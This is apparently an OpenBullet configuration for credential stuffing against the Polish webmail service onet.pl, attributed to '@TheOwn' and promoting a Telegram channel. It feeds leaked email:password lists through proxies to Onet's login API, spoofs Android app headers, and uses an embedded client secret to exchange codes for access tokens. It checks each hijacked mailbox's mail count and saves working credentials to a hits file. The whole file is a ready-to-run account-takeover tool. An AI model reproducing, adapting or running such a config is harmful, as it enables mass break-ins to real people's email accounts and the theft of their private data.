[SETTINGS]
{
  "Name": "onet.pl",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-11-18T14:02:57.1276326+03:30",
  "AdditionalInfo": "Telegram Channel: t.me/OpenBulletChannel | Capture | Save Hits | CPM rate: 200-2000",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#POST_LOGIN REQUEST POST "https://log-in.authorisation.onetapi.pl/" 
  CONTENT "{\"jsonrpc\":\"2.0\",\"id\":\"MqojOr1uAA==\",\"method\":\"login\",\"params\":{\"portal_id\":1,\"master_app_id\":\"android.poczta.onet.pl.front.onetapi.pl\",\"client_id\":\"android.poczta.onet.pl.front.onetapi.pl\",\"grant_type\":\"password\",\"login\":\"<USER>\",\"password\":\"<PASS>\",\"remember_me\":1}}" 
  CONTENTTYPE "application/json" 
  HEADER "accept-encoding: gzip" 
  HEADER "connection: Keep-Alive" 
  HEADER "content-type: application/json-rpc" 
  HEADER "host: log-in.authorisation.onetapi.pl" 
  HEADER "user-agent: Dalvik/2.1.0 (Linux; U; Android 7.1.2; SM-G955N Build/NRD90M.G955NKSU1AQDC) Mobile DreamLab pl.onet.mail/1.5.1046" 
  HEADER "x-onet-app: accountmanager.android.mobile-apps.onetapi.pl" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "User does not exist" 
    KEY "invalid password" 
  KEYCHAIN Success OR 
    KEY "token_type" 

#code PARSE "<SOURCE>" LR "\"code\": \"" "\"" -> VAR "code" 

#P1 REQUEST POST "https://log-in.authorisation.onetapi.pl/" 
  CONTENT "{\"jsonrpc\":\"2.0\",\"id\":\"67ypaZ5H4Q==\",\"method\":\"code_exchange\",\"params\":{\"portal_id\":\"1\",\"master_app_id\":\"android.poczta.onet.pl.front.onetapi.pl\",\"client_id\":\"android.poczta.onet.pl.front.onetapi.pl\",\"grant_type\":\"authorization_code\",\"code\":\"<code>\",\"client_secret\":\"k7RC9IbpZsuMrFp0YuODKQVxQen3f1pl\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "accept-encoding: gzip" 
  HEADER "content-type: application/json; charset=utf-8" 
  HEADER "host: log-in.authorisation.onetapi.pl" 
  HEADER "user-agent: Dart/2.19 (dart:io)" 
  HEADER "x-onet-app: android.poczta.onet.pl.front.onetapi.pl" 

#mt PARSE "<SOURCE>" LR "\"master_token\": \"" "\"" -> VAR "mt" 

#P2 REQUEST POST "https://log-in.authorisation.onetapi.pl/" 
  CONTENT "{\"jsonrpc\":\"2.0\",\"id\":\"858OBtAeQQ==\",\"method\":\"generate_code\",\"params\":{\"portal_id\":1,\"master_app_id\":\"android.poczta.onet.pl.front.onetapi.pl\",\"client_id\":\"android.poczta.onet.pl.front.onetapi.pl\"}}" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept-encoding: gzip" 
  HEADER "authorization: Bearer <mt>" 
  HEADER "content-type: application/json; charset=utf-8" 
  HEADER "host: log-in.authorisation.onetapi.pl" 
  HEADER "user-agent: Dart/2.19 (dart:io)" 
  HEADER "x-onet-app: android.poczta.onet.pl.front.onetapi.pl" 

#code2 PARSE "<SOURCE>" LR "\"code\": \"" "\"" -> VAR "code2" 

#P3 REQUEST POST "https://log-session.authorisation.onetapi.pl/" 
  CONTENT "{\"jsonrpc\":\"2.0\",\"id\":\"c9IxWOCN3g==\",\"method\":\"code_exchange\",\"params\":{\"portal_id\":1,\"client_id\":\"android.poczta.onet.pl.front.onetapi.pl\",\"grant_type\":\"authorization_code\",\"code\":\"<code2>\",\"client_secret\":\"k7RC9IbpZsuMrFp0YuODKQVxQen3f1pl\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "accept-encoding: gzip" 
  HEADER "content-type: application/json; charset=utf-8" 
  HEADER "host: log-in.authorisation.onetapi.pl" 
  HEADER "user-agent: Dart/2.19 (dart:io)" 
  HEADER "x-onet-app: android.poczta.onet.pl.front.onetapi.pl" 

#at PARSE "<SOURCE>" LR "\"access_token\": \"" "\"" -> VAR "at" 

#GET REQUEST GET "https://api.poczta.onet.pl/api/folder" 
  
  HEADER "accept-encoding: gzip" 
  HEADER "authorization: <at>" 
  HEADER "cookie: X-Onet-App=android.poczta.onet.pl.front.onetapi.pl" 
  HEADER "host: api.poczta.onet.pl" 
  HEADER "user-agent: Dart/2.19 (dart:io)" 
  HEADER "x-app-name: 5" 
  HEADER "x-onet-app: android.poczta.onet.pl.front.onetapi.pl" 
  HEADER "x-op-client: Mobile-android-google-user 9.0.0 20171130.276299 release-keys-2.12.4" 

#Total_Mails PARSE "<SOURCE>" LR "\"total_count\":" "," CreateEmpty=FALSE -> CAP "Total Mails" "[" "]" 

#SS UTILITY File "onet.pl Acc.txt" AppendLines "<USER>:<PASS> | Total Mails: <Total Mails> | Telegram Channel: t.me/OpenBulletChannel" -> VAR "SS" 

